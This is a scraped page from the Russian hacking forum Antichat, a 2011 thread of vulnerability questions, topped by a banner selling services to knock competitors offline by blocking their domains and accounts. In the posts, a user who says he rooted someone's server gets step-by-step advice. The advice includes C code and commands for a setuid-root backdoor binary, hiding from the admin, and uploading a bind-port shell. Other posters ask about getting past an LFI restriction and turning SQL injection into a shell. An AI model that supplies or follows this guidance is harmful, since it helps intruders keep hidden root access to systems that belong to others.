УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1639 из 2438

1639

Опции темы

Поиск в этой теме

Опции просмотра

#16381

19.02.2011, 17:07

rootmd

Guest

Сообщений: n/a

Провел на форуме:
23579

Репутация: -5

спасибо

а вот трабла

порутил сервер, uid=0, gid=0, sh-3.2, доступк по телнету (bind port). я смог открыть порт ssh, но не могу понять почему не получается зайти. (добавил пользователь и вручную ставил хеш в /etc/shadow)...authentication failure....не знаю?!

#16382

19.02.2011, 18:05

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от rootmd

rootmd said:
спасибо
а вот трабла
порутил сервер, uid=0, gid=0, sh-3.2, доступк по телнету (bind port). я смог открыть порт ssh, но не могу понять почему не получается зайти. (добавил пользователь и вручную ставил хеш в /etc/shadow)...authentication failure....не знаю?!

а зачем ты так палишся на серванте то? зачем новый юзверь..., подрубайся к северу через бекдор, если же он упал .создай себе лазейку..сначала сделай файл

root.с:

Код:

Код:

Code:
main() { 
setuid(0); 
setgid(0); 
system("/bin/bash"); 
}

Далее

Код:

Код:

Code:
gcc root.c -o syser
chmod 755 syser
chmod +s syser
mv syser /bin/syser

если бекдор закрылся, запускай из шелла заново и запускай :

Код:

Код:

Code:
$ /bin/syser
id
uid=0(root) gid=0(wheel) groups=0(wheel),80(www),1003(suwww)

#16383

19.02.2011, 18:09

rootmd

Guest

Сообщений: n/a

Провел на форуме:
23579

Репутация: -5

та проблема в том что у меня шелла нету....нету доступк ssh!

#16384

19.02.2011, 18:31

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Цитата:

Сообщение от rootmd

rootmd said:
та проблема в том что у меня шелла нету....нету доступк ssh!

раз ты "порутил" сервак, значит доступ у тебя к нему есть...какая проблема залить шелл (если веб-сервак) или bindport.pl и запустить?

#16385

19.02.2011, 18:34

rootmd

Guest

Сообщений: n/a

Провел на форуме:
23579

Репутация: -5

так пхп шелл я давно залил, делал bindport, подключился (telnet), порутил. и как дальше доступк к ssh получить?

#16386

19.02.2011, 20:07

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Цитата:

Сообщение от rootmd

rootmd said:
так пхп шелл я давно залил, делал bindport, подключился (telnet), порутил. и как дальше доступк к ssh получить?

ей Богу тебя не понимаю я...зачем тебе ssh ? какая разница что консоль у тебя на 22 или на 31337 порту?

#16387

19.02.2011, 20:11

rootmd

Guest

Сообщений: n/a

Провел на форуме:
23579

Репутация: -5

ой разница большая, на 11457 порту шелл не bash а sh, нету TERM терминала, а это ограничает мой возможности (например passwd не могу выполнить потому-что он не ждет пока я пасс напишу а уже пишет "Retype unix password")

и разные Pseudo-terminal will not be allocated because stdin is not a ...

#16388

19.02.2011, 20:23

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Цитата:

Сообщение от rootmd

rootmd said:
ой разница большая, на 11457 порту шелл не bash а sh, нету TERM терминала, а это ограничает мой возможности (например passwd не могу выполнить потому-что он не ждет пока я пасс напишу а уже пишет "Retype unix password")
и разные Pseudo-terminal will not be allocated because stdin is not a ...

не знаю..у меня все работает..

#16389

19.02.2011, 23:46

Vollkorn

Guest

Сообщений: n/a

Провел на форуме:
22665

Репутация: -6

Здравствуйте. Есть некий сайт, там присутствует local file inclusion, которая дописывает расширение .php. В чем вопрос, знаю можно попытаться отбросить нуль байтом, но когда я пытаюсь это сделать ничего не происходит, еще слышал о 4096 слешах, но даже при их добавлении пишет "Failed opening путь/passwd//////[много слешей]", без расширения. Подскажите пожалуйста что делать.

#16390

20.02.2011, 00:29

/Montana

Познающий

Регистрация: 26.10.2007

Сообщений: 83

Провел на форуме:
335555

Репутация: 45

Есть раскрученная инъекция, получил login:hash из mysql.user (хэш не могу сбрутить), mysql из под root, есть конфиг апача и etc/passwd (только пасов в нем нет).

Какие сейчас есть варианты получения шела?

Страница 1639 из 2438

1639

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход